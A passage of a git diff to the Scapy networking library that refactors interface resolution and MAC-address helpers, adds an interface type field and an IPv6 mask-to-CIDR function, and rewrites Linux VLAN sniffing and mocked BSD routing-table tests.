+++ b/scapy/arch/linux/__init__.py @@ -21,10 +21,7 @@ from scapy.compat import raw from scapy.consts import LINUX -from scapy.arch.common import ( - compile_filter, -) -from scapy.arch.unix import get_if +from scapy.arch.common import compile_filter from scapy.config import conf from scapy.data import MTU, ETH_P_ALL, SOL_PACKET, SO_ATTACH_FILTER, \ SO_TIMESTAMPNS @@ -37,16 +34,16 @@ from scapy.interfaces import ( InterfaceProvider, NetworkInterface, - network_name, _GlobInterfaceType, + network_name, + resolve_iface, ) from scapy.libs.structures import sock_fprog from scapy.packet import Packet, Padding from scapy.supersocket import SuperSocket # re-export -from scapy.arch.common import get_if_raw_addr # noqa: F401 -from scapy.arch.unix import read_nameservers, get_if_raw_hwaddr # noqa: F401 +from scapy.arch.common import get_if_raw_addr, read_nameservers # noqa: F401 from scapy.arch.linux.rtnetlink import ( # noqa: F401 read_routes, read_routes6, @@ -144,7 +141,10 @@ def attach_filter(sock, bpf_filter, iface): def set_promisc(s, iff, val=1): # type: (socket.socket, _GlobInterfaceType, int) -> None - mreq = struct.pack("IHH8s", get_if_index(iff), PACKET_MR_PROMISC, 0, b"") + _iff = resolve_iface(iff) + if not _iff.is_valid(): + raise OSError("set_promisc: Unknown interface %s" % iff) + mreq = struct.pack("IHH8s", _iff.index, PACKET_MR_PROMISC, 0, b"") if val: cmd = PACKET_ADD_MEMBERSHIP else: @@ -152,11 +152,6 @@ def set_promisc(s, iff, val=1): s.setsockopt(SOL_PACKET, cmd, mreq) -def get_if_index(iff): - # type: (_GlobInterfaceType) -> int - return int(struct.unpack("I", get_if(iff, SIOCGIFINDEX)[16:20])[0]) - - # Interface provider diff --git a/scapy/arch/linux/rtnetlink.py b/scapy/arch/linux/rtnetlink.py index 9a920e2ce71..a5e18bdb698 100644 --- a/scapy/arch/linux/rtnetlink.py +++ b/scapy/arch/linux/rtnetlink.py @@ -811,6 +811,7 @@ def _get_if_list(): ifindex = msg.ifi_index ifname = None mac = "00:00:00:00:00:00" + itype = msg.ifi_type ifflags = msg.ifi_flags ips = [] for attr in msg.data: @@ -826,6 +827,7 @@ def _get_if_list(): "index": ifindex, "flags": ifflags, "mac": mac, + "type": itype, "ips": ips, } return interfaces diff --git a/scapy/arch/solaris.py b/scapy/arch/solaris.py index dd6b22cfcd5..cb30bf04e89 100644 --- a/scapy/arch/solaris.py +++ b/scapy/arch/solaris.py @@ -18,6 +18,7 @@ # From sys/sockio.h and net/if.h SIOCGIFHWADDR = 0xc02069b9 # Get hardware address +from scapy.arch.common import get_if_raw_addr # noqa: F401, F403, E402 from scapy.arch.libpcap import * # noqa: F401, F403, E402 from scapy.arch.unix import * # noqa: F401, F403, E402 diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index ae90257eeb1..672a98a6da7 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -8,7 +8,6 @@ """ import os -import re import socket import struct from fcntl import ioctl @@ -18,7 +17,6 @@ from scapy.config import conf from scapy.consts import FREEBSD, NETBSD, OPENBSD, SOLARIS from scapy.error import log_runtime, warning -from scapy.interfaces import network_name, NetworkInterface from scapy.pton_ntop import inet_pton from scapy.utils6 import in6_getscope, construct_source_candidate_set from scapy.utils6 import in6_isvalid, in6_ismlladdr, in6_ismnladdr @@ -34,10 +32,9 @@ def get_if(iff, cmd): - # type: (Union[NetworkInterface, str], int) -> bytes + # type: (str, int) -> bytes """Ease SIOCGIF* ioctl calls""" - iff = network_name(iff) sck = socket.socket() try: return ioctl(sck, cmd, struct.pack("16s16x", iff.encode("utf8"))) @@ -45,7 +42,7 @@ def get_if(iff, cmd): sck.close() -def get_if_raw_hwaddr(iff, # type: Union[NetworkInterface, str] +def get_if_raw_hwaddr(iff, # type: str siocgifhwaddr=None, # type: Optional[int] ): # type: (...) -> Tuple[int, bytes] @@ -410,18 +407,3 @@ def read_routes6(): fd_netstat.close() return routes - - -####### -# DNS # -####### - -def read_nameservers() -> List[str]: - """Return the nameservers configured by the OS - """ - try: - with open('/etc/resolv.conf', 'r') as fd: - return re.findall(r"nameserver\s+([^\s]+)", fd.read()) - except FileNotFoundError: - warning("Could not retrieve the OS's nameserver !") - return [] diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 9213aeb8267..81b7bed57fd 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -36,9 +36,8 @@ from scapy.interfaces import NetworkInterface, InterfaceProvider, \ dev_from_index, resolve_iface, network_name from scapy.pton_ntop import inet_ntop -from scapy.utils import atol, itom, mac2str, str2mac +from scapy.utils import atol, itom, str2mac from scapy.utils6 import construct_source_candidate_set, in6_getscope -from scapy.data import ARPHDR_ETHER from scapy.compat import plain_str from scapy.supersocket import SuperSocket @@ -297,6 +296,7 @@ def _get_ips(x): "description": plain_str(x["description"]), "guid": plain_str(x["adapter_name"]), "mac": _get_mac(x), + "type": x["interface_type"], "ipv4_metric": 0 if WINDOWS_XP else x["ipv4_metric"], "ipv6_metric": 0 if WINDOWS_XP else x["ipv6_metric"], "ips": _get_ips(x), @@ -626,7 +626,7 @@ def iterinterfaces() -> Iterator[ # We have a libpcap provider: enrich pcap interfaces with # Windows data for netw, if_data in conf.cache_pcapiflist.items(): - name, ips, flags, _ = if_data + name, ips, flags, _, _ = if_data guid = _pcapname_to_guid(netw) if guid == legacy_npcap_guid: # Legacy Npcap detected ! @@ -785,12 +785,6 @@ def open_pcap(device, # type: Union[str, NetworkInterface] libpcap.open_pcap = open_pcap # type: ignore -def get_if_raw_hwaddr(iface): - # type: (Union[NetworkInterface, str]) -> Tuple[int, bytes] - _iface = resolve_iface(iface) - return ARPHDR_ETHER, _iface.mac and mac2str(_iface.mac) or b"\x00" * 6 - - def _read_routes_c_v1(): # type: () -> List[Tuple[int, int, str, str, str, int]] """Retrieve Windows routes through a GetIpForwardTable call. diff --git a/scapy/config.py b/scapy/config.py index 3fe04388617..e047aaf391a 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -965,7 +965,7 @@ class Conf(ConfClass): #: holds the Scapy interface list and manager ifaces = None # type: 'scapy.interfaces.NetworkInterfaceDict' #: holds the cache of interfaces loaded from Libpcap - cache_pcapiflist = {} # type: Dict[str, Tuple[str, List[str], Any, str]] + cache_pcapiflist = {} # type: Dict[str, Tuple[str, List[str], Any, str, int]] # `neighbor` will be filed by scapy.layers.l2 neighbor = None # type: 'scapy.layers.l2.Neighbor' #: holds the name servers IP/hosts used for custom DNS resolution diff --git a/scapy/interfaces.py b/scapy/interfaces.py index f40f529ea8b..f9dd76b0f72 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -117,6 +117,7 @@ def __init__(self, self.index = -1 self.ip = None # type: Optional[str] self.ips = defaultdict(list) # type: DefaultDict[int, List[str]] + self.type = -1 self.mac = None # type: Optional[str] self.dummy = False if data is not None: @@ -132,6 +133,7 @@ def update(self, data): self.network_name = data.get('network_name', "") self.index = data.get('index', 0) self.ip = data.get('ip', "") + self.type = data.get('type', -1) self.mac = data.get('mac', "") self.flags = data.get('flags', 0) self.dummy = data.get('dummy', False) @@ -240,7 +242,7 @@ def load_confiface(self): # Can only be called after conf.route is populated if not conf.route: raise ValueError("Error: conf.route isn't populated !") - conf.iface = get_working_if() + conf.iface = get_working_if() # type: ignore def _reload_provs(self): # type: () -> None @@ -370,7 +372,7 @@ def get_if_list(): def get_working_if(): - # type: () -> NetworkInterface + # type: () -> Optional[NetworkInterface] """Return an interface that works""" # return the interface associated with the route with smallest # mask (route by default if it exists) @@ -380,11 +382,17 @@ def get_working_if(): # First check the routing ifaces from best to worse, # then check all the available ifaces as backup. for ifname in itertools.chain(ifaces, conf.ifaces.values()): - iface = resolve_iface(ifname) # type: ignore - if iface.is_valid(): - return iface + try: + iface = conf.ifaces.dev_from_networkname(ifname) # type: ignore + if iface.is_valid(): + return iface + except ValueError: + pass # There is no hope left - return resolve_iface(conf.loopback_name) + try: + return conf.ifaces.dev_from_networkname(conf.loopback_name) + except ValueError: + return None def get_working_ifaces(): @@ -405,8 +413,8 @@ def dev_from_index(if_index): return conf.ifaces.dev_from_index(if_index) -def resolve_iface(dev): - # type: (_GlobInterfaceType) -> NetworkInterface +def resolve_iface(dev, retry=True): + # type: (_GlobInterfaceType, bool) -> NetworkInterface """ Resolve an interface name into the interface """ @@ -416,19 +424,14 @@ def resolve_iface(dev): return conf.ifaces.dev_from_name(dev) except ValueError: try: - return dev_from_networkname(dev) + return conf.ifaces.dev_from_networkname(dev) except ValueError: pass - # Return a dummy interface - return NetworkInterface( - InterfaceProvider(), - data={ - "name": dev, - "description": dev, - "network_name": dev, - "dummy": True - } - ) + if not retry: + raise ValueError("Interface '%s' not found !" % dev) + # Nothing found yet. Reload to detect if it was added recently + conf.ifaces.reload() + return resolve_iface(dev, retry=False) def network_name(dev): diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 2620c6e6583..aeedf8e35c2 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -43,7 +43,7 @@ from scapy.layers.inet import UDP, IP from scapy.layers.l2 import Ether, HARDWARE_TYPES from scapy.packet import bind_layers, bind_bottom_up, Packet -from scapy.utils import atol, itom, ltoa, sane, str2mac +from scapy.utils import atol, itom, ltoa, sane, str2mac, mac2str from scapy.volatile import ( RandBin, RandByte, @@ -54,7 +54,7 @@ RandNumExpo, ) -from scapy.arch import get_if_raw_hwaddr +from scapy.arch import get_if_hwaddr from scapy.sendrecv import srp1 from scapy.error import warning from scapy.config import conf @@ -551,10 +551,10 @@ def dhcp_request(hw=None, if hw is None: if iface is None: iface = conf.iface - _, hw = get_if_raw_hwaddr(iface) + hw = get_if_hwaddr(iface) dhcp_options = [ ('message-type', req_type), - ('client_id', b'\x01' + hw), + ('client_id', b'\x01' + mac2str(hw)), ] if requested_addr is not None: dhcp_options.append(('requested_addr', requested_addr)) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 79e978e4785..f8eef019574 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -15,7 +15,7 @@ import time from scapy.ansmachine import AnsweringMachine -from scapy.arch import get_if_raw_hwaddr, in6_getifaddr +from scapy.arch import get_if_hwaddr, in6_getifaddr from scapy.config import conf from scapy.data import EPOCH, ETHER_ANY from scapy.compat import raw, orb @@ -1588,8 +1588,7 @@ def norm_list(val, param_name): timeval = time.time() - delta # Mac Address - rawmac = get_if_raw_hwaddr(iface)[1] - mac = ":".join("%.02x" % orb(x) for x in rawmac) + mac = get_if_hwaddr(iface) self.duid = DUID_LLT(timeval=timeval, lladdr=mac) diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index c7ecf1f364a..e87cf21892b 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -111,7 +111,7 @@ class TunTapInterface(SimpleSocket): def __init__(self, iface=None, mode_tun=None, default_read_size=MTU, strip_packet_info=True, *args, **kwargs): self.iface = bytes_encode( - network_name(conf.iface if iface is None else iface) + network_name(conf.iface) if iface is None else iface ) self.mode_tun = mode_tun diff --git a/scapy/route6.py b/scapy/route6.py index 3862644c96a..4062359fea7 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -252,35 +252,6 @@ def route(self, dst="", dev=None, verbose=conf.verb): dst = socket.getaddrinfo(savedst, None, socket.AF_INET6)[0][-1][0] # TODO : Check if name resolution went well - # Choose a valid IPv6 interface while dealing with link-local addresses - if dev is None and (in6_islladdr(dst) or in6_ismlladdr(dst)): - dev = str(conf.iface) # default interface - - # Check if the default interface supports IPv6! - if dev not in self.ipv6_ifaces and self.ipv6_ifaces: - - tmp_routes = [route for route in self.routes - if route[3] != conf.iface] - - default_routes = [route for route in tmp_routes - if (route[0], route[1]) == ("::", 0)] - - ll_routes = [route for route in tmp_routes - if (route[0], route[1]) == ("fe80::", 64)] - - if default_routes: - # Fallback #1 - the first IPv6 default route - dev = default_routes[0][3] - elif ll_routes: - # Fallback #2 - the first link-local prefix - dev = ll_routes[0][3] - else: - # Fallback #3 - the loopback - dev = conf.loopback_name - - warning("The conf.iface interface (%s) does not support IPv6! " - "Using %s instead for routing!" % (conf.iface, dev)) - # Deal with dev-specific request for cache search k = dst if dev is not None: diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index ad008861ed3..6109a787a18 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -26,7 +26,7 @@ import warnings import zlib -from scapy.consts import WINDOWS +from scapy.consts import WINDOWS, BIG_ENDIAN from scapy.config import conf from scapy.compat import base64_bytes from scapy.themes import DefaultTheme, BlackAndWhite @@ -1105,6 +1105,9 @@ def main(): except AttributeError: pass + if BIG_ENDIAN: + KW_KO.append("little_endian_only") + if conf.use_pcap or WINDOWS: KW_KO.append("not_libpcap") if VERB > 2: diff --git a/scapy/utils6.py b/scapy/utils6.py index 5bc00e46041..0ee7ee89886 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -644,6 +644,22 @@ def in6_cidr2mask(m): return b"".join(struct.pack('!I', x) for x in t) +def in6_mask2cidr(m): + # type: (bytes) -> int + """ + Opposite of in6_cidr2mask + """ + if len(m) != 16: + raise Scapy_Exception("value must be 16 octets long") + + for i in range(0, 4): + s = struct.unpack('!I', m[i * 4:(i + 1) * 4])[0] + for j in range(32): + if not s & (1 << (31 - j)): + return i * 32 + j + return 128 + + def in6_getnsma(a): # type: (bytes) -> bytes """ diff --git a/test/bpf.uts b/test/bpf.uts index 259e4ca8318..5c7fb861973 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -12,13 +12,13 @@ get_if_raw_addr(conf.iface) -= Get the packed MAC address of conf.iface += Get the MAC address of conf.iface -get_if_raw_hwaddr(conf.iface) +get_if_hwaddr(conf.iface) -= Get the packed MAC address of conf.loopback_name += Get the MAC address of conf.loopback_name -get_if_raw_hwaddr(conf.loopback_name) == (ARPHDR_LOOPBACK, b'\x00'*6) +get_if_hwaddr(conf.loopback_name) == "00:00:00:00:00:00" ############ diff --git a/test/linux.uts b/test/linux.uts index 76a4e3da832..d651fccee3f 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -372,52 +372,42 @@ conf.ifaces.reload() conf.route.resync() conf.route6.resync() -= Test 802.Q sniffing += Test 802.1Q sniffing ~ linux needs_root veth +from scapy.arch.linux import VEthPair from threading import Thread, Condition -veth = VEthPair("left0", "right0") -veth.setup() -veth.up() -exit_status = os.system("ip link add link right0 name vlanright0 type vlan id 42") -exit_status = os.system("ip link add link left0 name vlanleft0 type vlan id 42") -exit_status = os.system("ip link set vlanright0 up") -exit_status = os.system("ip link set vlanleft0 up") -exit_status = os.system("ip addr add 198.51.100.1/24 dev vlanleft0") -exit_status = os.system("ip addr add 198.51.100.2/24 dev vlanright0") - -cond_started = Condition() - -def _sniffer_started(): - - global cond_started - cond_started.acquire() - cond_started.notify() - cond_started.release() - -cond_started.acquire() - -dot1q_count = 0 - -def _sniffer(): - sniffed = sniff(iface="right0", - lfilter=lambda p: Dot1Q in p, - count=2, - timeout=5, - started_callback=_sniffer_started) - global dot1q_count - dot1q_count = len(sniffed) - -t_sniffer = Thread(target=_sniffer, name="linux.uts sniff right0") -t_sniffer.start() -cond_started.wait() -sendp(Ether()/IP(dst="198.51.100.2")/ICMP(), iface='vlanleft0', count=2) - -t_sniffer.join(1) -assert dot1q_count == 2 +def _send(): + sendp(Ether()/IP(dst="198.51.100.2")/ICMP(), iface='vlanleft0', count=2) + + +with VEthPair("left0", "right0") as veth: + exit_status = os.system("ip link add link right0 name vlanright0 type vlan id 42") + exit_status = os.system("ip link add link left0 name vlanleft0 type vlan id 42") + exit_status = os.system("ip link set vlanright0 up") + exit_status = os.system("ip link set vlanleft0 up") + exit_status = os.system("ip addr add 198.51.100.1/24 dev vlanleft0") + exit_status = os.system("ip addr add 198.51.100.2/24 dev vlanright0") + sniffer = AsyncSniffer( + iface="right0", + lfilter=lambda p: Dot1Q in p, + count=2, + timeout=5, + started_callback=_send, + ) + sniffer.start() + sniffer.join(1) + if sniffer.running: + sniffer.stop() + raise Scapy_Exception("Sniffer did not stop !") + else: + results = sniffer.results + + +assert len(results) == 2 +assert all(Dot1Q in x for x in results) -veth.destroy() = Reload interfaces & routes diff --git a/test/regression.uts b/test/regression.uts index 3b2da6739c0..1cf742e68bb 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -311,7 +311,8 @@ from unittest import mock conf.iface -get_if_raw_hwaddr(conf.iface) +get_if_addr(conf.iface) +get_if_hwaddr(conf.iface) bytes_hex(get_if_raw_addr(conf.iface)) @@ -328,16 +329,6 @@ get_working_if() get_if_raw_addr6(conf.iface) -if conf.use_bpf: - addr = u"lladdr 29:0b:c2:ff:fe:53:21:e9\n" - b = Bunch(returncode=0, communicate=lambda *args, **kargs: (addr, None)) - with mock.patch('scapy.arch.bpf.core.subprocess.Popen', return_value=b) as popen: - try: - scapy.arch.bpf.core.get_if_raw_hwaddr("fw0") - assert False - except Scapy_Exception: - assert True - = More Interfaces related functions # Test name resolution @@ -353,7 +344,7 @@ from unittest import mock @mock.patch("scapy.interfaces.conf.ifaces.values") def _test_get_working_if(rou): rou.side_effect = lambda: [] - assert get_working_if() == conf.loopback_name + assert get_working_if() is None assert conf.iface + "a" # left + assert "hey! are you, ready to go ? %s" % conf.iface # format @@ -529,14 +520,17 @@ pkt.build() = Test read_routes6() - check mandatory routes +import re +ll_route = re.compile(r"fe80:\d{0,2}:") +# match fe80::, fe80:5:, etc. (if scoped) + conf.route6 -# Doesn't pass on Travis Bionic XXX if len(routes6) > 2 and not WINDOWS: # Identify routes to fe80::/64 assert sum(1 for r in routes6 if r[0] == "::1" and r[4] == ["::1"]) >= 1 - if not OPENBSD and len(iflist) >= 2: - assert sum(1 for r in routes6 if r[0] == "fe80::" and r[1] == 64) >= 1 + if len(iflist) >= 2: + assert sum(1 for r in routes6 if ll_route.match(r[0]) and r[1] == 64) >= 1 try: # Identify a route to a node IPv6 link-local address assert sum(1 for r in routes6 if in6_islladdr(r[0]) and r[1] == 128) >= 1 @@ -1787,7 +1781,7 @@ try: sniffer.start() sniffer.join() assert False, "Should have errored by now" -except (OSError, Scapy_Exception): +except ValueError: assert True = Sending a TCP syn 'forever' at layer 2 and layer 3 @@ -2933,297 +2927,321 @@ assert pkterf[1][Ether].src == "00:0f:53:3f:ca:c0" ############ ############ -+ Mocked read_routes() calls ++ Mocked read_routes() and read_routes6() calls -= Truncated netstat -rn output on OS X -~ mock_read_routes_bsd += Create patcher util +~ mock_read_routes_bsd little_endian_only +# mock the random to get consistency from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.get_if_addr") -@mock.patch("scapy.arch.unix.os") -def test_osx_netstat_truncated(mock_os, mock_get_if_addr): - """Test read_routes() on OS X 10.? with a long interface name""" - # netstat & ifconfig outputs from https://github.com/secdev/scapy/pull/119 - netstat_output = u""" -Routing tables - -Internet: -Destination Gateway Flags Refs Use Netif Expire -default 192.168.1.1 UGSc 460 0 en1 -default link#11 UCSI 1 0 bridge1 -127 127.0.0.1 UCS 1 0 lo0 -127.0.0.1 127.0.0.1 UH 10 2012351 lo0 -""" - ifconfig_output = u"lo0 en1 bridge10\n" - # Mocked file descriptors - def se_popen(command): - """Perform specific side effects""" - if command.startswith("netstat -rn"): - return StringIO(netstat_output) - elif command == "ifconfig -l": - ret = StringIO(ifconfig_output) - def unit(): - return ret - ret.__call__ = unit - ret.__enter__ = unit - ret.__exit__ = lambda x,y,z: None - return ret - raise Exception("Command not mocked: %s" % command) - mock_os.popen.side_effect = se_popen - # Mocked get_if_addr() behavior - def se_get_if_addr(iface): - """Perform specific side effects""" - if iface == "bridge1": - return "0.0.0.0" - return "1.2.3.4" - mock_get_if_addr.side_effect = se_get_if_addr - # Test the function - from scapy.arch.unix import read_routes - scapy.arch.unix.DARWIN = True - scapy.arch.unix.FREEBSD = False - scapy.arch.unix.NETBSD = False - scapy.arch.unix.OPENBSD = False - routes = read_routes() - assert len(routes) == 4 - assert [r for r in routes if r[3] == "bridge10"] - - -test_osx_netstat_truncated() - - -= macOS 10.13 -~ mock_read_routes_bsd -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.get_if_addr") -@mock.patch("scapy.arch.unix.os") -def test_osx_10_13_ipv4(mock_os, mock_get_if_addr): - """Test read_routes() on OS X 10.13""" - # 'netstat -rn -f inet' output - netstat_output = u""" -Routing tables - -Internet: -Destination Gateway Flags Refs Use Netif Expire -default 192.168.28.1 UGSc 82 0 en0 -127 127.0.0.1 UCS 0 0 lo0 -127.0.0.1 127.0.0.1 UH 1 878 lo0 -169.254 link#5 UCS 0 0 en0 -192.168.28 link#5 UCS 4 0 en0 -192.168.28.1/32 link#5 UCS 2 0 en0 -192.168.28.1 88:32:9c:f5:4e:ea UHLWIir 40 37 en0 1177 -192.168.28.2 62:aa:56:4b:51:54 UHLWI 0 0 en0 619 -192.168.28.4 38:17:ed:9a:58:28 UHLWIi 1 6 en0 428 -192.168.28.18/32 link#5 UCS 1 0 en0 -192.168.28.18 88:32:9c:f5:4e:eb UHLWI 0 1 lo0 -192.168.28.28 04:0e:eb:11:74:a7 UHLWI 0 0 en0 576 -224.0.0/4 link#5 UmCS 1 0 en0 -224.0.0.251 1:0:5e:0:0:fb UHmLWI 0 0 en0 -255.255.255.255/32 link#5 UCS 0 0 en0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked get_if_addr() output - def se_get_if_addr(iface): - """Perform specific side effects""" - import socket - if iface == "en0": - return "192.168.28.18" - return "127.0.0.1" - mock_get_if_addr.side_effect = se_get_if_addr - # Test the function - from scapy.arch.unix import read_routes - scapy.arch.unix.DARWIN = False - scapy.arch.unix.FREEBSD = True - scapy.arch.unix.NETBSD = False - scapy.arch.unix.OPENBSD = False - routes = read_routes() - for r in routes: - print(r) - assert len(routes) == 15 - default_route = [r for r in routes if r[0] == 0][0] - assert default_route[3] == "en0" and default_route[4] == "192.168.28.18" - -test_osx_10_13_ipv4() - - -= macOS 10.15 -~ mock_read_routes_bsd +from scapy.pton_ntop import inet_pton +import scapy.arch.bpf.pfroute + +og_afinet6 = socket.AF_INET6 +og_inet_pton = socket.inet_pton +def mock_inet_pton(af, data): + if af in [24, 28, 30]: + return og_inet_pton(og_afinet6, data) + return og_inet_pton(af, data) + + +og_inet_ntop = socket.inet_ntop +def mock_inet_ntop(af, data): + if af in [24, 28, 30]: + return og_inet_ntop(og_afinet6, data) + return og_inet_ntop(af, data) + + +class BSDLoader: + def __init__(self, OPENBSD=False, FREEBSD=False, NETBSD=False, DARWIN=False, sysctldata=None, ifaces={}, AF_INET6=socket.AF_INET6): + self.sysctldata = sysctldata + self.ifaces = ifaces + socket.AF_LINK = 18 + self.loadpatches = [ + mock.patch('socket.AF_INET6', AF_INET6), + mock.patch('socket.inet_pton', side_effect=mock_inet_pton), + mock.patch('socket.inet_ntop', side_effect=mock_inet_ntop), + mock.patch('scapy.consts.OPENBSD', OPENBSD), + # mock.patch('scapy.consts.FREEBSD', FREEBSD), + mock.patch('scapy.consts.NETBSD', NETBSD), + mock.patch('scapy.consts.DARWIN', DARWIN), + ] + def __enter__(self): + # Apply patches that only occur when loading + for p in self.loadpatches: + p.start() + # Reload module + pfroute = importlib.reload(scapy.arch.bpf.pfroute) + # Now apply post-load patches + self.patches = [ + mock.patch.object( + pfroute, + '_sr1_bsdsysctl', + return_value=pfroute.pfmsghdrs(self.sysctldata) + ), + mock.patch.object( + pfroute, + '_get_if_list', + return_value=self.ifaces, + ), + ] + for p in self.patches: + p.start() + return pfroute + def __exit__(self, *args, **kwargs): + for p in self.loadpatches: + p.stop() + for p in self.patches: + p.stop() + + += OpenBSD 7.5 amd64 - read_routes() +~ mock_read_routes_bsd little_endian_only + +import zlib + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789c7bc1c0ca92c0c0c8c0c0c0c160cec2c0e0ccc10006de0f1850003f0376c08a431c06049830f96bc40f30e2925710626460636163c828cb3360108d6548e5c4aabf0bc6576248c9482ec8494d2c4e4dc1e78e03607f323380fd09243d71f853109be6067c2623dcf5008d5fcfc080e2cf0f48f20a42cc0c1240e7e4e41be0340f593fbafbbd71b81f2b20d2fdf504dcff9f2aee6704bbdf151873d8dc8f961ce0ee67c4264ec0bd18ee0702cadc0fe2b280ddefc8d880d5fdb80031ee07a66b747e1732ffff7f440a22359f5c80bb9f1912fe2ccc58ddcf03a5cd675f494316c71a2f98f6c1bd09761f1002dd26f4b900bb7ad4f820d73fd0f4c4a280d53f5c04dc4dc03f70fb88711f25fe3980ee1f0607acfe61a7c83fe7ffa3f2d1d317f9ee1f05a360148c8251300a46c128180543030000bd836967')) + + +with BSDLoader(OPENBSD=True, sysctldata=_PFROUTE_DATA, AF_INET6=24) as pfroute: + routes = pfroute.read_routes() + + +assert routes == [ + (0, 0, '172.23.192.1', 'hvn0', '172.23.192.138', 1), + (3758096384, 4026531840, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2130706432, 4278190080, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2130706433, 4294967295, '127.0.0.1', 'lo0', '127.0.0.1', 1), + (2887237632, 4294963200, '172.23.192.138', 'hvn0', '172.23.192.138', 1), + (2887237633, 4294967295, '0.0.0.0', 'hvn0', '172.23.192.138', 1), + (2887237770, 4294967295, '0.0.0.0', 'hvn0', '172.23.192.138', 1), + (2887241727, 4294967295, '172.23.192.138', 'hvn0', '172.23.192.138', 1) +] -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.get_if_addr") -@mock.patch("scapy.arch.unix.os") -def test_osx_10_15_ipv4(mock_os, mock_get_if_addr): - """Test read_routes() on OS X 10.15""" - # 'netstat -rn -f inet' output - netstat_output = u""" -Routing tables - -Internet: -Destination Gateway Flags Netif Expire -default 192.168.122.1 UGSc en0 -127 127.0.0.1 UCS lo0 -127.0.0.1 127.0.0.1 UH lo0 -169.254 link#8 UCS en0 ! -192.168.122 link#8 UCS en0 ! -192.168.122.1/32 link#8 UCS en0 ! -192.168.122.1 52:54:0:c0:b7:af UHLWIir en0 1169 -192.168.122.63/32 link#8 UCS en0 ! -224.0.0/4 link#8 UmCS en0 ! -224.0.0.251 1:0:5e:0:0:fb UHmLWI en0 -255.255.255.255/32 link#8 UCS en0 ! -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked get_if_addr() output - def se_get_if_addr(iface): - """Perform specific side effects""" - import socket - if iface == "en0": - return "192.168.122.42" - return "127.0.0.1" - mock_get_if_addr.side_effect = se_get_if_addr - # Test the function - from scapy.arch.unix import read_routes - scapy.arch.unix.DARWIN = False - scapy.arch.unix.FREEBSD = True - scapy.arch.unix.NETBSD = False - scapy.arch.unix.OPENBSD = False - routes = read_routes() - for r in routes: - print(r) - assert len(routes) == 11 - default_route = [r for r in routes if r[0] == 0][0] - assert default_route[3] == "en0" and default_route[4] == "192.168.122.42" - -test_osx_10_15_ipv4() - - -= OpenBSD 6.3 -~ mock_read_routes_bsd -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.get_if_addr") -@mock.patch("scapy.arch.unix.OPENBSD") -@mock.patch("scapy.arch.unix.os") -def test_openbsd_6_3(mock_os, mock_openbsd, mock_get_if_addr): - """Test read_routes() on OpenBSD 6.3""" - # 'netstat -rn -f inet' output - netstat_output = u""" -Routing tables - -Internet: -Destination Gateway Flags Refs Use Mtu Prio Iface -default 10.0.1.254 UGS 0 0 - 8 bge0 -224/4 127.0.0.1 URS 0 23 32768 8 lo0 -10.0.1/24 10.0.1.26 UCn 4 192 - 4 bge0 -10.0.1.1 00:30:48:57:ed:0b UHLc 2 338 - 3 bge0 -10.0.1.2 00:03:ba:0c:0b:52 UHLc 1 186 - 3 bge0 -10.0.1.26 00:30:48:62:b3:f4 UHLl 0 47877 - 1 bge0 -10.0.1.135 link#1 UHLch 1 194 - 3 bge0 -10.0.1.254 link#1 UHLch 1 190 - 3 bge0 -10.0.1.255 10.0.1.26 UHb 0 0 - 1 bge0 -10.188.6/24 10.188.6.17 Cn 0 0 - 4 tap3 -10.188.6.17 fe:e1:ba:d7:ff:32 UHLl 0 25 - 1 tap3 -10.188.6.255 10.188.6.17 Hb 0 0 - 1 tap3 -10.188.135/24 10.0.1.135 UGS 0 0 1350 L 8 bge0 -127/8 127.0.0.1 UGRS 0 0 32768 8 lo0 -127.0.0.1 127.0.0.1 UHhl 1 3835230 32768 1 lo0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - - # Mocked OpenBSD parsing behavior - mock_openbsd = True - - # Mocked get_if_addr() output - def se_get_if_addr(iface): - """Perform specific side effects""" - import socket - if iface == "bge0": - return "192.168.122.42" - return "10.0.1.26" - mock_get_if_addr.side_effect = se_get_if_addr - - # Test the function - from scapy.arch.unix import read_routes - return read_routes() - -routes = test_openbsd_6_3() - -for r in routes: - print(ltoa(r[0]), ltoa(r[1]), r) - # check that default route exists in parsed data structure - if ltoa(r[0]) == "0.0.0.0": - default = r - # check that route with locked mtu exists in parsed data structure - if ltoa(r[0]) == "10.188.135.0": - locked = r - -assert len(routes) == 11 -assert default[2] == "10.0.1.254" -assert default[3] == "bge0" -assert locked[2] == "10.0.1.135" -assert locked[3] == "bge0" - -= Solaris 11.1 -~ mock_read_routes_bsd += OpenBSD 7.5 amd64 - read_routes6() +~ mock_read_routes_bsd little_endian_only + +import zlib + +_PFROUTE_DATA = 